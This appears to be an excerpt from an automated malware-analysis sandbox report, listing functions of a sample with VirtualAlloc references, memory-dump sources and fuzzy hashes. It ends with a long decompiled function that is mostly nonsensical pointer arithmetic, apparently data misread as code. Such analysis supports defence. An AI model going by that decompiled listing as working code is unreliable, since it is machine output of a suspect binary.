Instruction Fuzzy Hash: AA3152E1E6E307D9E2685A5098805F9600CE60F754232BD7B894F375C3947D3627B4AF

Uniqueness

Uniqueness Score: -1.00%

Function 00406A58, Relevance: 1.5, APIs: 1, Instructions: 221memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00406D2C

Memory Dump Source

Source File: 00000000.00000002.1737108122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1737093572.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1737190061.0000000000414000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1737310362.0000000000416000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: f8583cac854473a0d7fa29734c7e8976892b4ceb544fad571242c666c27814fa
Instruction ID: 4f1248afd8229ad0f29f3ab4056a4919673fa5e312d2f2d83855c8a1dbbb4fa8
Opcode Fuzzy Hash: f8583cac854473a0d7fa29734c7e8976892b4ceb544fad571242c666c27814fa
Instruction Fuzzy Hash: E93176E1E6E307D9E2285A6098804F9640CEA0F754232BD7B894F378C3547D3627B46F

Uniqueness

Uniqueness Score: -1.00%

Function 00406C4E, Relevance: 1.5, APIs: 1, Instructions: 208memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00406D2C

Memory Dump Source

Source File: 00000000.00000002.1737108122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1737093572.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1737190061.0000000000414000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1737310362.0000000000416000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 115e28e38d26beff4123de70a67d18e381e7c65575262c4ffe7d8d1bfbcc6361
Instruction ID: 3980194cf7f9552c6294a7dd093f491901ff128413f4fb630aca4bcdda27276a
Opcode Fuzzy Hash: 115e28e38d26beff4123de70a67d18e381e7c65575262c4ffe7d8d1bfbcc6361
Instruction Fuzzy Hash: DF3125E1E6E307D9E368596498844F9540CA60F754132BD7B890F375C3447D3627B4AF

Uniqueness

Uniqueness Score: -1.00%

Function 00406AE6, Relevance: 1.4, APIs: 1, Instructions: 198memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00406D2C

Memory Dump Source

Source File: 00000000.00000002.1737108122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1737093572.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1737190061.0000000000414000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1737310362.0000000000416000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 70694633d21bdb7170406bfb560024d43a891b16c10aebb01dc24e3cd865c623
Instruction ID: a85e495619123e26eaefdd7ae495c948a5a849b553f177dc621e6f43d766d623
Opcode Fuzzy Hash: 70694633d21bdb7170406bfb560024d43a891b16c10aebb01dc24e3cd865c623
Instruction Fuzzy Hash: B03165E1E6E317D9E2284A6098804F8604CEA0F754232BD7B894F374C3447D3627B0AF

Uniqueness

Uniqueness Score: -1.00%

Function 00406B45, Relevance: 1.4, APIs: 1, Instructions: 196memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00406D2C

Memory Dump Source

Source File: 00000000.00000002.1737108122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1737093572.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1737190061.0000000000414000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1737310362.0000000000416000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: c58f50e09f106bbfd77e9f7a5d904648ef9e11627fd9ca61042744def9186b62
Instruction ID: e5af649d97162a935f48f510a321896e72ab9142ff4fa27fef1683d1c8c31eb6
Opcode Fuzzy Hash: c58f50e09f106bbfd77e9f7a5d904648ef9e11627fd9ca61042744def9186b62
Instruction Fuzzy Hash: 4D3140E1E2E307E9E2284A5088805F8200CEA0F754232BD7B894F374C7857C3627B4AF

Uniqueness

Uniqueness Score: -1.00%

Function 00406CDD, Relevance: 1.4, APIs: 1, Instructions: 193memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00406D2C

Memory Dump Source

Source File: 00000000.00000002.1737108122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1737093572.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1737190061.0000000000414000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1737310362.0000000000416000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: b643d57961a31637af71f75545064a0360affa76a495224173b9a512760a136e
Instruction ID: 0ebdf1b17810947bd5201f0e27f842e14dff61c26aa1bf44353921bd97afb926
Opcode Fuzzy Hash: b643d57961a31637af71f75545064a0360affa76a495224173b9a512760a136e
Instruction Fuzzy Hash: 3E3125E1E2E307D8E2685A6098944F9540CA60F754232BD77890F375C3957D3627B0AF

Uniqueness

Uniqueness Score: -1.00%

Function 00406B2C, Relevance: 1.4, APIs: 1, Instructions: 191memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00406D2C

Memory Dump Source

Source File: 00000000.00000002.1737108122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1737093572.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1737190061.0000000000414000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1737310362.0000000000416000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 5e7358e51f90b9f96d8e7074d6a31bf2a4ac2f0dca23b3890ba7a778612cc805
Instruction ID: 44b5e310d39ba641099577cb93c42ac29c6b233cb843dc23a7734203ed52ff18
Opcode Fuzzy Hash: 5e7358e51f90b9f96d8e7074d6a31bf2a4ac2f0dca23b3890ba7a778612cc805
Instruction Fuzzy Hash: 693132E1E6E307E9E2684A6098804F9200CEA0F754232BD7B894F375C3557D3627B4AF

Uniqueness

Uniqueness Score: -1.00%

Function 00406C34, Relevance: 1.4, APIs: 1, Instructions: 190memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00406D2C

Memory Dump Source

Source File: 00000000.00000002.1737108122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1737093572.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1737190061.0000000000414000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1737310362.0000000000416000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 2941cb966f54abd570df5a82b2b7feb806d35e4cea3c7b306148d5d4c3ca0de3
Instruction ID: d0bdd21fac5da6794c8f032b86e96e41ad259c9721db0bb03defb6e7b68952e4
Opcode Fuzzy Hash: 2941cb966f54abd570df5a82b2b7feb806d35e4cea3c7b306148d5d4c3ca0de3
Instruction Fuzzy Hash: 6B3155E1E2E307D8E22C595498804F9244CA60F754232BD3B890F374C3447D3627B0AF

Uniqueness

Uniqueness Score: -1.00%

Function 00406C78, Relevance: 1.4, APIs: 1, Instructions: 180memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00406D2C

Memory Dump Source

Source File: 00000000.00000002.1737108122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1737093572.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1737190061.0000000000414000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1737310362.0000000000416000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 0ce600a7f079ff465e715f26920d14797632d7c661e5cdbf85a28451d0cd9447
Instruction ID: 7b7760ea323c26159daee2c53e043289ca3455ee31b0dc947721c697cbe00772
Opcode Fuzzy Hash: 0ce600a7f079ff465e715f26920d14797632d7c661e5cdbf85a28451d0cd9447
Instruction Fuzzy Hash: CC3144E1E2E307E8E368566098804F9100CA60F794232BD7B8A0F375C3547D3627B4AF

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00402F88, Relevance: 5.8, Strings: 4, Instructions: 802
COMMONCrypto

Download Yara Rule

C-Code - Quality: 69%

			E00402F88(intOrPtr* _a4) {
				char _v32;
				intOrPtr _v36;
				char* _v40;
				intOrPtr _v44;
				void* _v48;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				char _v80;
				char _v84;
				signed int _v88;
				char _v92;
				intOrPtr _v96;
				char _v100;
				char _v108;
				intOrPtr _v116;
				char _v124;
				char* _v132;
				intOrPtr _v140;
				char* _v148;
				intOrPtr _v156;
				char _v160;
				char _v164;
				char _v168;
				char _v172;
				char _v176;
				char _v180;
				char _v184;
				char _v188;
				char _v196;
				intOrPtr _v200;
				char _v204;
				char* _v208;
				char _v212;
				signed int _v216;
				signed int _v220;
				intOrPtr* _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				char _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				intOrPtr* _v276;
				signed int _v280;
				intOrPtr* _v284;
				signed int _v288;
				intOrPtr* _v292;
				signed int _v296;
				signed int _v300;
				intOrPtr* _v304;
				signed int _v308;
				intOrPtr* _v312;
				signed int _v316;
				signed int _v320;
				intOrPtr* _v324;
				signed int _v328;
				intOrPtr* _v332;
				signed int _v336;
				intOrPtr* _v340;
				signed int _v344;
				intOrPtr* _v348;
				signed int _v352;
				signed int _v356;
				void* _v360;
				signed int _v364;
				void* _v368;
				signed int _v372;
				intOrPtr* _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				intOrPtr* _v392;
				signed int _v396;
				intOrPtr* _v400;
				signed int _v404;
				void* _t612;
				signed char _t613;
				signed char _t614;
				intOrPtr* _t615;
				void* _t618;
				intOrPtr* _t619;
				intOrPtr* _t620;
				void* _t621;
				intOrPtr* _t622;
				intOrPtr* _t623;
				intOrPtr* _t624;
				intOrPtr* _t625;
				signed char _t628;
				signed char _t629;
				signed int _t631;
				void* _t633;
				intOrPtr* _t634;
				signed int _t636;
				intOrPtr* _t637;
				void* _t638;
				intOrPtr* _t639;
				void* _t640;
				intOrPtr* _t641;
				intOrPtr* _t643;
				void* _t644;
				intOrPtr* _t645;
				intOrPtr* _t647;
				intOrPtr* _t648;
				void* _t658;
				intOrPtr* _t661;
				void* _t662;
				intOrPtr* _t665;
				void* _t667;
				void* _t670;
				void* _t671;
				void* _t673;
				void* _t675;
				void* _t677;
				void* _t680;
				intOrPtr* _t682;
				void* _t683;
				void* _t684;
				void* _t686;
				void* _t689;
				void* _t691;
				void* _t694;
				intOrPtr* _t698;
				intOrPtr* _t702;
				intOrPtr* _t704;
				intOrPtr* _t705;
				intOrPtr* _t708;
				intOrPtr* _t711;
				intOrPtr* _t714;
				intOrPtr* _t716;
				intOrPtr* _t717;
				intOrPtr* _t721;
				intOrPtr* _t724;
				intOrPtr* _t727;
				signed int* _t730;
				signed int* _t731;
				signed int* _t732;
				intOrPtr* _t735;
				intOrPtr* _t737;
				void* _t738;
				intOrPtr* _t739;
				signed char _t740;
				void* _t741;
				signed int _t742;
				void* _t743;
				intOrPtr* _t744;
				intOrPtr* _t747;
				intOrPtr* _t748;
				signed int _t761;
				signed int _t765;
				signed int _t772;
				signed int _t776;
				char* _t780;
				signed int _t784;
				signed int _t791;
				signed int _t799;
				signed int _t803;
				char* _t807;
				signed int _t811;
				signed int _t818;
				signed int _t824;
				signed int _t828;
				char* _t832;
				signed int _t836;
				signed int _t840;
				signed int _t844;
				signed int _t848;
				signed int _t852;
				signed int _t865;
				signed int _t874;
				signed int _t878;
				char* _t882;
				signed int _t886;
				signed int _t890;
				signed int _t894;
				signed int _t907;
				signed int _t917;
				signed int _t924;
				signed int _t928;
				char* _t932;
				signed int _t936;
				char* _t950;
				intOrPtr* _t953;
				unsigned char* _t954;
				signed char _t956;
				signed int* _t989;
				intOrPtr* _t1009;
				void* _t1015;
				void* _t1016;
				void* _t1017;
				void* _t1019;
				void* _t1028;
				void* _t1029;
				void* _t1030;
				void* _t1032;
				char* _t1038;
				intOrPtr* _t1039;
				unsigned char* _t1046;
				void* _t1053;
				intOrPtr* _t1055;
				void* _t1065;
				void* _t1081;
				intOrPtr _t1082;
				void* _t1084;
				void* _t1085;
				void* _t1086;
				intOrPtr* _t1088;

				_t613 = _t612 + 1;
				 *_t956 =  *_t956 + _t613;
				 *((intOrPtr*)(_t613 - 0x60000000)) =  *((intOrPtr*)(_t613 - 0x60000000)) + _t956;
				_t614 = _t613 & 0x00000040;
				 *((intOrPtr*)(_t614 + _t614)) =  *((intOrPtr*)(_t614 + _t614)) + _t614;
				_t615 = _t614 +  *_t614;
				 *_t615 =  *_t615 + _t615;
				 *_t615 =  *_t615 + _t615;
				 *_t615 =  *_t615 + _t615;
				 *_t615 =  *_t615 + _t615;
				 *0x3b800040 =  *0x3b800040 - _t1009;
				 *_t615 =  *_t615 + "TimerB";
				_t618 = _t615 +  *_t615 + 1;
				 *_t956 =  *_t956 + _t618;
				 *((intOrPtr*)(_t618 + _t618 + 0x24a00000)) =  *((intOrPtr*)(_t618 + _t618 + 0x24a00000)) + _t956;
				_t619 = _t618 + 1;
				 *_t1039 =  *_t1039 + _t956;
				 *_t953 =  *_t953 + _t619;
				 *_t619 =  *_t619 + _t619;
				 *_t619 =  *_t619 + _t619;
				 *_t619 =  *_t619 + _t619;
				 *_t619 =  *_t619 + _t619;
				 *((intOrPtr*)(_t1053 +  &(_t1046[0x40]))) =  *((intOrPtr*)(_t1053 +  &(_t1046[0x40]))) + _t619;
				 *((intOrPtr*)(_t619 + 0x5000813b)) =  *((intOrPtr*)(_t619 + 0x5000813b)) + _t619;
				_t620 = _t619 + 1;
				 *_t1039 =  *_t1039 + _t956;
				 *_t953 =  *_t953 + _t620;
				 *_t620 =  *_t620 + _t620;
				 *_t620 =  *_t620 + _t620;
				 *_t620 =  *_t620 + _t620;
				 *((intOrPtr*)(_t620 + 0x1e004024)) =  *((intOrPtr*)(_t620 + 0x1e004024)) + _t620;
				 *_t953 =  *_t953 + _t620;
				 *_t620 =  *_t620 + _t620;
				 *_t620 =  *_t620 + _t620;
				 *_t620 =  *_t620 + _t620;
				 *_t620 =  *_t620 + _t620;
				 *((intOrPtr*)(_t620 + 0x35)) =  *((intOrPtr*)(_t620 + 0x35)) + _t620;
				_t621 = _t620 + 1;
				 *((intOrPtr*)(_t621 + 0x6000813b)) =  *((intOrPtr*)(_t621 + 0x6000813b)) + _t621;
				_t622 = _t621 + 1;
				 *_t1046 =  *_t1046 + _t953;
				 *_t953 =  *_t953 + _t622;
				 *_t622 =  *_t622 + _t622;
				 *_t622 =  *_t622 + _t622;
				_t623 = _t1055;
				 *_t623 =  *_t623 + _t623;
				 *((intOrPtr*)(_t623 + 0x10004024)) =  *((intOrPtr*)(_t623 + 0x10004024)) + _t623;
				 *_t953 =  *_t953 + _t623;
				 *_t623 =  *_t623 + _t623;
				 *_t623 =  *_t623 + _t623;
				 *_t623 =  *_t623 + _t623;
				 *_t623 =  *_t623 + _t623;
				 *((intOrPtr*)(_t1053 +  &(_t1046[0x40]))) =  *((intOrPtr*)(_t1053 +  &(_t1046[0x40]))) + _t953;
				 *((intOrPtr*)(_t623 + 0x6c00813b)) =  *((intOrPtr*)(_t623 + 0x6c00813b)) + _t623;
				_t624 = _t623 + 1;
				 *_t624 =  *_t624 + _t1009;
				 *_t953 =  *_t953 + _t624;
				 *_t624 =  *_t624 + _t624;
				 *_t624 =  *_t624 + _t624;
				_t625 = _t624;
				 *_t625 =  *_t625 + _t625;
				 *((intOrPtr*)(_t625 + 0x1b004024)) =  *((intOrPtr*)(_t625 + 0x1b004024)) + _t625;
				 *_t953 =  *_t953 + _t625;
				 *_t625 =  *_t625 + _t625;
				 *_t625 =  *_t625 + _t625;
				 *_t625 =  *_t625 + _t625;
				 *_t625 =  *_t625 + _t625;
				 *((intOrPtr*)(_t625 - 0x7fffbfcb)) =  *((intOrPtr*)(_t625 - 0x7fffbfcb)) + _t953;
				 *_t953 =  *_t953 + _t953;
				 *_t953 =  *_t953 + _t625;
				 *_t625 =  *_t625 + _t625;
				 *_t625 =  *_t625 + _t625;
				asm("pushfd");
				 *_t625 =  *_t625 + _t625;
				 *((intOrPtr*)(_t625 + 0xc004024)) =  *((intOrPtr*)(_t625 + 0xc004024)) + _t625;
				 *_t953 =  *_t953 + _t625;
				 *_t625 =  *_t625 + _t625;
				 *_t625 =  *_t625 + _t625;
				 *_t625 =  *_t625 + _t625;
				 *_t625 =  *_t625 + _t625;
				 *((intOrPtr*)(_t1053 +  &(_t1046[0x3b800040]))) =  *((intOrPtr*)(_t1053 +  &(_t1046[0x3b800040]))) + _t1009;
				 *_t625 =  *_t625 + "SMINKERNE";
				_t628 = _t625 +  *_t625 + 1;
				 *_t956 =  *_t956 + _t628;
				 *((intOrPtr*)(_t628 - 0x60000000)) =  *((intOrPtr*)(_t628 - 0x60000000)) + _t628;
				_t629 = _t628 & 0x00000040;
				 *_t1009 =  *_t1009 + _t953;
				 *_t953 =  *_t953 + _t629;
				 *_t629 =  *_t629 + _t629;
				 *_t629 =  *_t629 + _t629;
				 *_t629 =  *_t629 + _t629;
				 *_t629 =  *_t629 + _t629;
				_t631 = _t629 + _t1009 ^ 0x3b800040;
				 *_t631 =  *_t631 + "Nondominant3";
				asm("sbb al, [eax]");
				_t633 = _t631 +  *_t631 + 1;
				 *_t956 =  *_t956 + _t633;
				 *((intOrPtr*)(_t633 + _t633 + 0x24a00000)) =  *((intOrPtr*)(_t633 + _t633 + 0x24a00000)) + _t633;
				_t634 = _t633 + 1;
				 *_t1039 =  *_t1039 + _t634;
				 *_t953 =  *_t953 + _t634;
				 *_t634 =  *_t634 + _t634;
				 *_t634 =  *_t634 + _t634;
				 *_t634 =  *_t634 + _t634;
				 *_t634 =  *_t634 + _t634;
				_t636 = _t634 + _t956 ^ 0x3b800040;
				 *_t636 =  *_t636 + "Stickability6";
				_pop(es);
				 *_t953 =  *_t953 + _t636;
				 *_t636 =  *_t636 + _t636;
				 *_t636 =  *_t636 + _t636;
				 *_t636 =  *_t636 + _t636;
				_t637 =  *0xb004024;
				 *_t953 =  *_t953 + _t637;
				 *_t637 =  *_t637 + _t637;
				 *_t637 =  *_t637 + _t637;
				 *_t637 =  *_t637 + _t637;
				 *_t637 =  *_t637 + _t637;
				 *_t637 =  *_t637 + _t956;
				_t638 = _t637 + 1;
				 *((intOrPtr*)(_t638 - 0x4bff7ec5)) =  *((intOrPtr*)(_t638 - 0x4bff7ec5)) + _t638;
				_t639 = _t638 + 1;
				 *_t953 =  *_t953 + _t956;
				 *_t953 =  *_t953 + _t639;
				 *_t639 =  *_t639 + _t639;
				 *_t639 =  *_t639 + _t639;
				asm("lodsb");
				 *_t639 =  *_t639 + _t639;
				 *((intOrPtr*)(_t639 + 0x13004024)) =  *((intOrPtr*)(_t639 + 0x13004024)) + _t639;
				 *_t953 =  *_t953 + _t639;
				 *_t639 =  *_t639 + _t639;
				 *_t639 =  *_t639 + _t639;
				 *_t639 =  *_t639 + _t639;
				 *_t639 =  *_t639 + _t639;
				_t1046[_t1046] = _t1046[_t1046] + _t639;
				_t640 = _t639 + 1;
				 *((intOrPtr*)(_t640 - 0x43ff7ec5)) =  *((intOrPtr*)(_t640 - 0x43ff7ec5)) + _t640;
				_t641 = _t640 + 1;
				 *_t953 =  *_t953 + _t1009;
				 *_t953 =  *_t953 + _t641;
				 *_t641 =  *_t641 + _t641;
				 *_t641 =  *_t641 + _t641;
				 *0 =  *0;
				_t643 =  *0xe004024;
				 *_t953 =  *_t953 + _t643;
				 *_t643 =  *_t643 + _t643;
				 *_t643 =  *_t643 + _t643;
				 *_t643 =  *_t643 + _t643;
				 *_t643 =  *_t643 + _t643;
				 *((intOrPtr*)(_t643 + 0x36)) =  *((intOrPtr*)(_t643 + 0x36)) + _t643;
				_t644 = _t643 + 1;
				 *((intOrPtr*)(_t644 - 0x2bff7ec5)) =  *((intOrPtr*)(_t644 - 0x2bff7ec5)) + _t644;
				_t645 = _t644 + 1;
				 *_t1046 =  *_t1046 + _t956;
				 *_t953 =  *_t953 + _t645;
				 *_t645 =  *_t645 + _t645;
				 *_t645 =  *_t645 + _t645;
				 *0 =  *0;
				_t647 =  *0x16004024;
				 *_t953 =  *_t953 + _t647;
				 *_t647 =  *_t647 + _t647;
				 *_t647 =  *_t647 + _t647;
				 *_t647 =  *_t647 + _t647;
				 *_t647 =  *_t647 + _t647;
				_t1046[ &(_t1046[0x40])] = _t1046[ &(_t1046[0x40])] + _t953;
				 *((intOrPtr*)(_t647 - 0x1bff7ec5)) =  *((intOrPtr*)(_t647 - 0x1bff7ec5)) + _t647;
				_t648 = _t647 + 1;
				 *_t1046 =  *_t1046 + _t1009;
				 *_t953 =  *_t953 + _t648;
				 *_t648 =  *_t648 + _t648;
				 *_t648 =  *_t648 + _t648;
				 *_t956 =  *_t956 + _t956;
				 *_t953 =  *_t953;
				 *0xa0000000 =  *0xa0000000;
				 *0xa0000000 =  *0xa0000000;
				 *0xa0000000 =  *0xa0000000;
				 *0xa0000000 =  *0xa0000000;
				 *0xFFFFFFFFA0000036 =  *((intOrPtr*)(0xffffffffa0000036)) + _t953;
				 *0xFFFFFFFF9400813B =  *((intOrPtr*)(0xffffffff9400813b)) + 1;
				 *_t956 =  *_t956 + _t956;
				 *_t953 =  *_t953 + 2;
				 *((intOrPtr*)(_t956 - 0x49ffbfca)) =  *((intOrPtr*)(_t956 - 0x49ffbfca)) + _t956;
				_t954 = _t953 + 3;
				_t1046[ &(_t1046[0x36dd0040])] =  &(_t954[_t1046[ &(_t1046[0x36dd0040])]]);
				_t658 = 4 + _t1009 + 3;
				 *0xa0000000 =  *0xa0000000 + _t658;
				 *0xa0000000 =  *0xa0000000 + _t658;
				 *0xFFFFFFFFA000002C =  *((intOrPtr*)(0xffffffffa000002c)) + _t658;
				_t661 = _t658 + 1 + _t658 + 1 -  *((intOrPtr*)(_t658 + 1 + _t658 + 1));
				asm("adc eax, [eax]");
				asm("adc eax, [eax]");
				_push(0xa0000000);
				asm("adc eax, [eax]");
				 *0xa0000000 =  *0xa0000000 + _t661;
				 *0xa0000000 =  *0xa0000000 + _t661;
				 *0xa0000000 =  *0xa0000000 + _t661;
				 *0xa0000000 =  *0xa0000000 + _t661;
				_push(0xc000402c);
				_t662 = _t661 -  *_t661;
				asm("adc eax, [eax]");
				asm("adc eax, [eax]");
				_push(0xa0000000);
				asm("adc eax, [eax]");
				 *0xa0000000 =  *0xa0000000 + _t662;
				 *0xa0000000 =  *0xa0000000 + _t662;
				 *0xa0000000 =  *0xa0000000 + _t662;
				 *0xa0000000 =  *0xa0000000 + _t662;
				_t665 = _t662 - 0x40 + _t662 - 0x40 -  *((intOrPtr*)(_t662 - 0x40 + _t662 - 0x40));
				asm("adc eax, [eax]");
				asm("adc eax, [eax]");
				_push(0xa0000000);
				asm("adc eax, [eax]");
				 *0xa0000000 =  *0xa0000000 + _t665;
				 *0xa0000000 =  *0xa0000000 + _t665;
				 *0xa0000000 =  *0xa0000000 + _t665;
				 *_t665 =  *_t665 + _t665;
				_t667 = 0xc000402c -  *0xc000402c;
				asm("adc eax, [eax]");
				asm("adc eax, [eax]");
				_push(0xc000402c);
				asm("adc eax, [eax]");
				 *0xc000402c =  *0xc000402c + _t667;
				 *0xc000402c =  *0xc000402c + _t667;
				 *0xc000402c =  *0xc000402c + _t667;
				 *0xc000402c =  *0xc000402c + _t667;
				asm("loopne 0x2e");
				_t670 = _t667 + 1 + _t667 + 1 -  *((intOrPtr*)(_t667 + 1 + _t667 + 1));
				asm("adc eax, [eax]");
				_t1015 = _t1009 + _t956 - 0xfffffffffffffffd;
				asm("adc eax, [eax]");
				_push(0xc000402c);
				asm("adc eax, [eax]");
				 *0xc000402c =  *0xc000402c + _t670;
				 *0xc000402c =  *0xc000402c + _t670;
				 *0xc000402c =  *0xc000402c + _t670;
				 *0xc000402c =  *0xc000402c + _t670;
				 *0x2bc00040 =  *0x2bc00040 | _t956;
				_t671 = _t670 + 1;
				_t954[_t1015 + 0x40] = _t954[_t1015 + 0x40] + _t671;
				 *((intOrPtr*)(_t1015 + 0x13)) =  *((intOrPtr*)(_t1015 + 0x13)) + _t956;
				 *0xFFFFFFFFC000403F =  *((intOrPtr*)(0xffffffffc000403f)) + _t1015;
				_t673 = _t671 + 2;
				 *0xc000402c =  *0xc000402c + _t673;
				 *0xc000402c =  *0xc000402c + _t673;
				 *0xc000402c =  *0xc000402c + _t673;
				 *0xc000402c =  *0xc000402c + _t673;
				 *0xc000402c =  *0xc000402c + _t1015;
				_t675 = _t673 - 0x2bc00040 + 1;
				_t954[_t1015 + 0x40] = _t954[_t1015 + 0x40] + _t675;
				 *((intOrPtr*)(_t1015 + 0x13)) =  *((intOrPtr*)(_t1015 + 0x13)) + _t956;
				 *((intOrPtr*)(0xffffffffc000403f)) =  *((intOrPtr*)(0xffffffffc000403f)) + _t1015;
				_t677 = _t675 + 2;
				 *0xc000402c =  *0xc000402c + _t677;
				 *0xc000402c =  *0xc000402c + _t677;
				 *0xc000402c =  *0xc000402c + _t677;
				 *0xc000402c =  *0xc000402c + _t677;
				 *0xFFFFFFFFC0004059 =  *((intOrPtr*)(0xffffffffc0004059)) + _t954;
				_t680 = _t677 + 1 + _t677 + 1 -  *((intOrPtr*)(_t677 + 1 + _t677 + 1));
				asm("adc eax, [eax]");
				_t1016 = _t1015 - 1;
				asm("adc eax, [eax]");
				_push(0xc000402c);
				asm("adc eax, [eax]");
				 *0xc000402c =  *0xc000402c + _t680;
				 *0xc000402c =  *0xc000402c + _t680;
				 *0xc000402c =  *0xc000402c + _t680;
				 *0xc000402c =  *0xc000402c + _t680;
				 *0x2bc00040 =  *0x2bc00040 - 0x40;
				_t954[_t1016 + 0x40] = _t954[_t1016 + 0x40] + _t680;
				 *((intOrPtr*)(_t1016 + 0x13)) =  *((intOrPtr*)(_t1016 + 0x13)) + _t956;
				 *((intOrPtr*)(0xffffffffc000403f)) =  *((intOrPtr*)(0xffffffffc000403f)) + _t1016;
				_t682 = _t680 + 2;
				 *0xc000402c =  *0xc000402c + _t682;
				 *0xc000402c =  *0xc000402c + _t682;
				 *0xc000402c =  *0xc000402c + _t682;
				 *0xc000402c =  *0xc000402c + _t682;
				 *0xFFFFFFFF80008059 =  *((intOrPtr*)(0xffffffff80008059)) + _t956;
				_t683 = _t682 -  *_t682;
				asm("adc eax, [eax]");
				_t1017 = _t1016 - 1;
				asm("adc eax, [eax]");
				_push(0xc000402c);
				asm("adc eax, [eax]");
				 *0xc000402c =  *0xc000402c + _t683;
				 *0xc000402c =  *0xc000402c + _t683;
				 *0xc000402c =  *0xc000402c + _t683;
				 *0xc000402c =  *0xc000402c + _t683;
				 *0x2bc00040 =  *0x2bc00040 >> 1;
				_t684 = _t683 + 1;
				_t954[_t1017 + 0x40] = _t954[_t1017 + 0x40] + _t684;
				 *((intOrPtr*)(_t1017 + 0x13)) =  *((intOrPtr*)(_t1017 + 0x13)) + _t956;
				 *((intOrPtr*)(0xffffffffc000403f)) =  *((intOrPtr*)(0xffffffffc000403f)) + _t1017;
				_t686 = _t684 + 2;
				 *0xc000402c =  *0xc000402c + _t686;
				 *0xc000402c =  *0xc000402c + _t686;
				 *0xc000402c =  *0xc000402c + _t686;
				 *0xc000402c =  *0xc000402c + _t686;
				_t689 = _t686 + _t954 - 0x2bc00040 + 1;
				_t954[_t1017 + 0x40] = _t954[_t1017 + 0x40] + _t689;
				 *((intOrPtr*)(_t1017 + 0x13)) =  *((intOrPtr*)(_t1017 + 0x13)) + _t956;
				 *((intOrPtr*)(0xffffffffc000403f)) =  *((intOrPtr*)(0xffffffffc000403f)) + _t1017;
				_t691 = _t689 + 2;
				 *0xc000402c =  *0xc000402c + _t691;
				 *0xc000402c =  *0xc000402c + _t691;
				 *0xc000402c =  *0xc000402c + _t691;
				 *0xc000402c =  *0xc000402c + _t691;
				 *0xc000402c =  *0xc000402c + _t691;
				_t694 = _t691 + 1 + _t691 + 1 -  *((intOrPtr*)(_t691 + 1 + _t691 + 1));
				asm("adc eax, [eax]");
				asm("adc eax, [eax]");
				_push(0xc000402c);
				asm("adc eax, [eax]");
				 *0xc000402c =  *0xc000402c + _t694;
				 *0xc000402c =  *0xc000402c + _t694;
				 *0xc000402c =  *0xc000402c + _t694;
				 *0xc000402c =  *0xc000402c + _t694;
				 *0xc000402c =  *0xc000402c + _t694;
				 *0xc000402c =  *0xc000402c + _t694;
				 *0xc000402c =  *0xc000402c + _t694;
				 *0xc000402c =  *0xc000402c + _t694;
				 *0xc000402c =  *0xc000402c + _t694;
				 *0xc000402c =  *0xc000402c + _t694;
				 *0xc000402c =  *0xc000402c + _t694;
				 *0xc000402c =  *0xc000402c + _t694;
				 *0xc000402c =  *0xc000402c + _t694;
				 *0xc000402c =  *0xc000402c + _t694;
				 *0xc000402c =  *0xc000402c + _t694;
				 *0xc000402c =  *0xc000402c + _t694;
				 *0xc000402c =  *0xc000402c + _t694;
